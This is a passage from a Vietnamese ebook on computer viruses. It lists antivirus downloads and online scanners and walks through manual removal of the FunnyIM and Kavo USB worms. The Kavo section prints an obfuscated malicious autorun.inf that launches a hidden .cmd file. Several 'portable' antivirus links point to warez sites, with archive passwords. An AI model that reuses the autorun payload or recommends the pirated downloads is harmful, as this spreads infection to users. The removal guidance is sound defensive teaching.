nd

er.co

m

ww

w.sy

man

tec.co

m

ww

w.ka

spersky

.com

Tra

ng

ch

Page 40: Tong Quan Virus

Một số phần mềm khác :1. Avira AntiVir PersonalEdition Classic 7 : http://www.download.com/3001-2239_4-10808072.html?spi=231a59b4b19fa79372b4bc989b78d613&part=dl-10322935 2. Comodo AntiVirus : http://download.comodo.com/cav/download/CAVS_Setup_2.0.17.58_Beta.exe 3. ClamWin : http://downloads.sourceforge.net/clamwin/clamwin-0.92-setup.exe 4. PC Tools AntiVirus Free Edition : http://www.pctools.com/mirror/avinstall.exe 5. McAfee VirusScan Plus 2008 : http://www.download.com/McAfee-VirusScan-Plus/3000-2239_4-10582866.html 6. Ad-Aware : http://www.download.com.vn/Virus+Spyware+Malware+Trojan/Anti+Virus+Spyware+Malware+Trojan/Software-4741/Ad-Aware+2007 7. Spybot S & D : http://www.download.com/Spybot-Search-Destroy/3000-8022_4-10743107.html?tag=lst-1 8. Spyware Guard : http://www.download.com/SpywareGuard/3000-8022_4-10514468.html?tag=lst-7

Một số bản portable các phần mềm chống virus :Các bản Portable khá hữu dụng nếu bạn phải thường xuyên sử dụng các máy tính khác nhau.1. Portable Kaspersky Internet Security 7.0.0.125 http://www.mediafire.com/?8gm4yem9lty 2. Portable Norton AntiVirus 2007http://rs289.rapidshare.com/files/73676866/Portable_Symantec_Norton_Antivirus.rar 3. Portable Spyware Doctor 5.0.1http://rs11.rapidshare.com/files/58574386/SpyD.Portable_5.0.1.200_by__preet5_cyberwarez.info.exePassword để giải nén : www.cyberwarez.info4. Portable AVG Anti-Spyware Plus 7.5.1.43http://www.mediafire.com/?9imvxnultomPassword để giải nén : blogtinhoc.net

Quét virus onlineĐôi khi bạn cam thấy chưa chắc chắn khi quét virus cho hệ thống bằng một phần mềm diệt virus duy nhất, hay bạn e ngại việc cài phần mềm diệt virus vào máy. Bạn có thể quét virus trực tuyến qua các địa chỉ sau :http://enterprises.pandasoftware.com/products/activescan/ http://security.symantec.com/sscv6/vc_scan.asp?langid=ie&venid=sym&plfid=23&pkj=VBBYNBRFNJSVSTIVVBE&vc_scanstate=2 http://housecall.trendmicro.com/housecall/start_corp.asp http://www.kaspersky.com/virusscanner http://www.bitdefender.com/scan8/ie.html

Dù việc quét virus trực tuyến là khả hữu dụng, tuy nhiên những công cụ trên không thể giúp bạn bảo vệ hệ thống của thường trực với những nguy hiểm. Vì vậy việc cài một phần mềm diệt virus tốt sẵn trong máy là điều bạn nên làm

Chương 5 : Tự diệt một số virusFunnyIMHình thức lây nhiễm :- FunnyIM là một worm lây nhiễm qua USB (Có icon giả dạng thư mục).- Các thư mục chia sẻ trong cùng mạng nội bộ

Page 41: Tong Quan Virus

- Qua Yahoo MessengerĐặc điểm đáng chú ý:- Virus cùng lúc tạo ra 3 tiến trình con và bảo vệ lẫn nhau. - Tạo khóa khởi động cùng hệ thống là 2 khóa Shell và UserInit (Đã nói phần trên).Nhận dạng :Dùng ProcessXP bạn sẽ thấy 3 tiến trình với 3 icon giống nhau (Hình thư mục) đang hoạt động.

Dùng Autoruns bạn sẽ nhận ra những sửa chửa tại 2 key Shell và UserInit (Đã nói ở phần trên cuốn sách)

Tiêu diệt :1. Tiêu diệt các tiến trìnhDo các tiến trình của virus tự động bảo vệ lẫn nhau (Khi bạn tiêu diệt 1 trong 3 tiến trình thì các tiến trình kia sẽ tự gọi lại tiến trình này), vì vậy việc tiêu diệt các tiến trình này theo cách thông thường là tiêu diệt từng tiến trình là rất khó.Chúng ta có thể dừng sự hoạt động của các tiến trình (Suspend) rồi tiến hành tiệu diệt như bình thường.Mở ProcessXP, chọn lần lượt các tiến trình của virus và Process -> Suspend (Hoặc ấn chuột phải rồi chọn Suspend). Sau khi Suspend mỗi tiến trình thì chúng sẽ chuyển màu để báo hiệu cho bạn biết là đã bị dừng (Mặc định sẽ là màu xám).Cuối cùng bạn lần lượt tiêu diệt các tiến trình (Process -> Kill process, hoặc chuột phải rồi chọn Kill process).

Với một số dạng virus tạo nhiều tiến trình cùng lúc, ngay cả việc bạn Suspend chúng cũng không có tác dụng vì chúng tự nhận ra bị Suspend và tự phục hồi.Với dạng virus này, cách duy nhất bạn làm là phải tiêu diệt gần như liên tục tất cả các tiến trình do virus tạo ra.

Page 42: Tong Quan Virus

Bạn có thể dùng Process Viewer để làm việc này.Process Viewer : Là một phần mềm quản lý tiến trình hệ thống tốt, hỗ trợ các tính năng gần như tương đồng ProcessXP. Ngoài ra còn hỗ trợ xem các chương trình khởi động cùng hệ thống, diệt đồng thời nhiều tiến trình... Tuy nhiên, các tính năng về quản lý tiến trình hệ thống thì phần mềm kém hơn ProcessXP.

Để diệt nhiều tiến trình cùng lúc, trong Process Viewer ta thực hiện như sau :- Bạn giữ phím Ctrl và chọn các tiến trình muốn tiêu diệt (Giống như chọn cùng lúc nhiều file hay thư mục với các chương trình quản lý file).

- Bạn chọn Process -> Kill (Hoặc nhấn chuột phải và chọn Kill)- Hộp thoại Kill sẽ xuất hiện. Và bạn chọn Kill để hoàn thành việc tiêu diệt các tiến trình đã chọn.

2. Xóa các khóa khởi độngBây giờ bạn cần phải sửa lại các key Shell và UserInit về giá trị ban đầu (Các giá trị hiện nay là những giá trị đã bị virus thay đổi).Ở đây tôi sẽ sử dụng registry (Start -> Run... Nhập vào regedit rồi chọn OK).Bạn có thể truy xuất theo đường dẫn của 2 khóa Shell và UserInit này ở phía trên rồi phục hồi lại các giá trị như ban đầu. Có một mẹo nhỏ để nhanh chóng tới các khóa này là bạn mở Autoruns và nháy đúp vào khóa ấy, chương trình sẽ tự động gọi Registry với địa chỉ của khóa đó.

Page 43: Tong Quan Virus

Bạn nên lưu ý, do 2 khóa Shell và UserInit là 2 khóa khá nhạy cảm nên bạn nên thận trọng trong từng thao tác với chúng.3. Xóa các fileTrong suốt quá trình nhận dạng và diệt virus vừa rồi bạn sẽ nhận ra những địa chỉ lưu trữ virus. Như máy tôi sẽ là các đường dẫn sau :C:\Windows\system32\sviq.exeC:\Windows\system\Fun.exeC:\Windows\system32\dc.exeC:\Windows\system32\config\Win.exeC:\Windows\system32\WinSit.exeTôi có thể dễ dàng xóa chúng bằng Windows Explorer do các file này không đặt các thuộc tính ẩn.4. Phục hồi :Virus này không phá hoại hay thiết lập gì khác trong hệ thống nên việc diệt chúng trong máy bạn đã hoàn thành.Do virus này lây qua USB nên bạn cần thực hiện thao tác diệt chúng trong đĩa USB nếu có (Bạn xem thêm ở phần trên).

KavoHình thức lây nhiễm :- Qua USB (Tự tạo file autorun.inf trong đĩa USB để lây nhiễm).Đặc điểm đáng chú ý :- Sử dụng kỹ thuật Rootkit (Code inject).Nó tự inject thư viện kavo0.dll vào các tiến trình đang hoặc động của hệ thống, vì vậy rất tiêu diệt.- Ngoài việc sử dụng file autorun.inf để lây nhiễm qua đĩa USB, virus còn sử dụng file này để kích hoạt mình khi đã nhiễm vào máy nạn nhân bằng cách tạo file này trong các ổ đĩa của hệ thống. Nếu bạn truy cập vào các ổ đĩa này theo cách thông thường (Nháy đúp) thì chắc chắn bạn sẽ kích hoạt virus.- Hiện nay ở Việt Nam có một số biến thể của loại virus này, bản thân tôi, khi đang viết cuốn sách này cũng gặp một biến thể mới của chúng. Trong phần này tôi sẽ tiến hành diệt trên biến thể này.Nhận dạng :

Page 44: Tong Quan Virus

Dùng autoruns (Hay các chương trình quản lý chương trình khởi động cùng hệ thống khác) sẽ nhận ra sự xuất hiện của một khóa tên là kava.Do lỗi kỹ thuật của người lập trình ra virus nên khi máy bạn nhiễm virus này thì bạn không thể đăng nhập vào Yahoo Messenger.Khi ấn chuột phải vào các ổ đĩa của hệ thống, bạn sẽ nhận ra một tùy biến lạ (Trong biến thể tôi đang đang thử nghiệm thì tùy biến lạ này không xuất hiện).Virus sẽ inject thư viện kavo0.dll vào các tiến trình đang hoạt động. Để nhận ra bạn có thể sử dụng một số chương trình có cho phép xem các thư viện mà tiến trình sử dụng khi hoạt động (Tôi sử dụng phần mềm ProcessXP).

Tiêu diệt :1. Tiêu diệt tiến trìnhCũng như các virus khác, việc đầu tiên bạn phải làm để tiêu diệt được virus này là bạn phải dừng được hoạt động của virus. Tuy nhiên, virus không chạy dưới dạng một tiến trình như các chương trình khác để bạn dễ dàng tiêu diệt nó.Để dừng hoạt động của chúng bạn phải ngừng việc thư việc kavo0.dll inject trong các tiến trình khác.

Việc dừng hoạt động của loại virus như các phương pháp hướng dẫn hiện nay trên các diễn đàn tin học đã nói rất nhiều. Cách này đơn giản, hiệu quả tuy nhiên theo tôi nhận thấy thì việc sử dụng rập khuôn chúng sẽ không giải quyết được những virus tương tự như phức tạp hơn. Vì vậy tôi sẽ trình bày cả 2 cách tiêu diệt virus này.Cách 1 :Bạn có thể dùng MSConfig hay bất cứ chương trình quản lý khởi động nào để bỏ khóa khởi động mang tên kava.Ở đây tôi sẽ sử dụng Autoruns.

Page 45: Tong Quan Virus

Sau đó khởi động lại máy tính.Lúc này virus đã không còn hoạt động trên máy tính của bạn.Cách 2 :Bạn có thể nhận ra rằng, cách dừng tiến trình hoạt động của virus như trên là khá “may rủi” vì nếu virus đó liên tục tiến hành ghi key trong registry thì việc làm của bạn như cách 1 chỉ là vô ích.Inject thực chất là việc đưa một đoạn mã của chương trình thông qua thư viện liên kết động (DLL) vào một tiến trình đang chạy. Việc này giúp che giấu hoạt động của chương trình sử dụng inject.Việc dừng hoạt động của virus lúc này chính là việc “bóc tách” thư viện này ra khỏi các tiến trình.Đâu tiên, tôi sử dụng ProcessXP để xác định các tiến trình bị thư viện kavo0.dll inject.Như ở máy tôi, các tiến trình bị thư viện này inject là :Explorer.exeUnikey.exeWmplayer.exeWinword.exeBạn nên chú ý phân biện việc inject này chỉ là sự nhiễm mã độc của virus trong bộ nhớ (memory) của các tiến trình, chứ không phải là bản thân các file ấy bị nhiễm virus. Vì vậy, với các file này chúng ta chỉ cần “bóc tách” thư viện kavo0.dll ra mà thôi chứ không xóa chúng khỏi hệ thống.Bước tiếp theo là bước “bóc tách” như tôi đã phân tích ở trên. Tôi đã thử một số phần mềm quản lý tiến trình khác nhau thì chỉ mới nhận thấy phần mềm IceSword và công cụ [FireLion] Process Manager (Nằm trong [FireLion] All Tools In One 1.0 đã nói ở phần trên cuốn sách) có tính năng này.Công cụ IceSword rõ ràng chuyên nghiệp và nhiều tính năng hơn, nó liệt kê nhiều thông tin hơn về tiến trình. Tuy nhiên hoạt động chậm hơn [FireLion] Process Manager.

Sau đây là các bước để “bóc tách” thư viện kavo0.dll ra khỏi các tiến trình :

Page 46: Tong Quan Virus

Với [FireLion] Process Manager :Bạn lần lượt chọn các tiến trình đã xác định là bị inject, rồi nhìn trong khung hiển thị các thư viện được sử dụng bên dưới để tìm thư viện kavo0.dll. Sau đó chọn thư viện kavo0.dll và bấm nút Unload.

Với IceSword :Khởi động IceSword, chọn thẻ Functions -> Process.Bạn lần lượt ấn chuột phải chọn vào từng tiến trình mà bạn đã xác định bị inject để xuất hiện menu tương ứng và chọn Module Information.Hộp thoại Module Information sẽ xuất hiện. Bạn tìm đến giá trị chứa thư viện kavo0.dll và chọn Unload.

Page 47: Tong Quan Virus

Bạn chú ý :- Thực hiện Unload thao tác này mà không bỏ sót tiến trình mà bạn đã xác định bị inject nào. - Đồng thời bạn cũng nên để ý là thư viện kavo0.dll có khả năng sẽ được đổi tên tùy từng lúc của virus, cụ thể là khi diệt nó bằng IceSword thì thư viện này tên là kavo1.dll )2. Tiêu diệt virusSau khi thực hiện xong bước 1. Virus đã dừng hoạt động, tuy nhiên như vậy không tức là nó đã bị tiêu diệt, bạn còn cần thực hiện các thao tác sau.

Bạn thực hiện các thao tác để xóa các tập tin ẩn sau trong hệ thống :C:\Windows\system32\kavo0.dllC:\Windows\system32\kavo.exeĐể thực hiện việc xóa này, bạn làm các thao tác như đã trình bày ở phần trên của cuốn sách này nhằm có thể hiển thị các tập tin, thư mục ẩn và xóa chúng. Tôi sử dụng Total Commander để làm việc này.Tháo tác tiếp theo là bạn truy cập vào từng đĩa cứng trong máy bạn để tìm file autorun.inf. Bạn hãy đọc thông tin bên trong chúng (Bạn có thể dùng Notapad để làm việc này). Ví dụ ở máy tôi, file này sẽ có nội dung như sau :

;0s3iJw2jnDS95koalksaCwsKdD4r95r[AutoRun];3l43wisKlfp7i7open=0wk2.cmd;KscD2Kl0LDakdZrs8aj2XDwa4kkfo5Dr4Fe2sdmqdiIof0cqlwwDkaalaSJLKLJ34sshell\open\Command=0wk2.cmd;8iadi3iA4A2ika44wDL8jk41k3rr0LLfassLiDkfshell\open\Default=1;Sjl2r2lwai4L4wi1DD34o21e0KdKrk2aAd2ows0k9miwJ75kpKDk79S8flL23Ask5ksDK0Adia23Kf4a4dashell\explore\Command=0wk2.cmd

Page 48: Tong Quan Virus

;1sKAsf4jiliiwqlA3adlp3oldS5krwiqLowCac7eajdSK

Chúng ta dễ dàng nhận ra, file 0wk2.cmd sẽ được chạy khi bạn nháy đúp vào ổ đĩa tương ứng chứa file autoruns.inf.Vậy bây giờ bạn xóa file autoruns.inf và file 0wk2.cmd trong mỗi ổ đĩa trong máy mình.Sở dĩ tôi muốn bạn phải thực hiện thao tác động file autorun.inf là để bạn không bị rập khuôn một cách cứng nhắc khi diệt virus. Thực ra với biến thể virus kavo cũ mà tôi gặp thì nó sẽ tạo các file ntdelect.com trong mỗi phân vùng ổ cứng, nếu bạn rập khuôn một cách cứng nhắc “công thức” diệt virus kavo là phải tìm và xóa file ntdelect.com như trên thì đồng nghĩa với biến thể khác (Như biến thể tôi đang gặp) bạn sẽ không diệt được nó.Chú ý : Trong suốt quá trình diệt virus, bạn không được phép truy cập dữ liệu trong các ổ đĩa trong Windows Explorer bằng cách nháy đúp, thay vào đó bạn hãy sử dụng cách tôi đã giới thiệu ở phần Tránh Autorun của USB. Hoặc một giải pháp an toàn là sử dụng các chương trình quản lý file thay thế (Như Total Commander).

Page 49: Tong Quan Virus

Tài liệu tham khảo :1. www.wikipedia.com 2. www.quantrimang.com 3. www.virusvn.com 4. www.allapi.net 5. www.hvaonline.net 6. www.vnsecuity.com 7. www.pcworld.com.vn 8. www.download.com.vn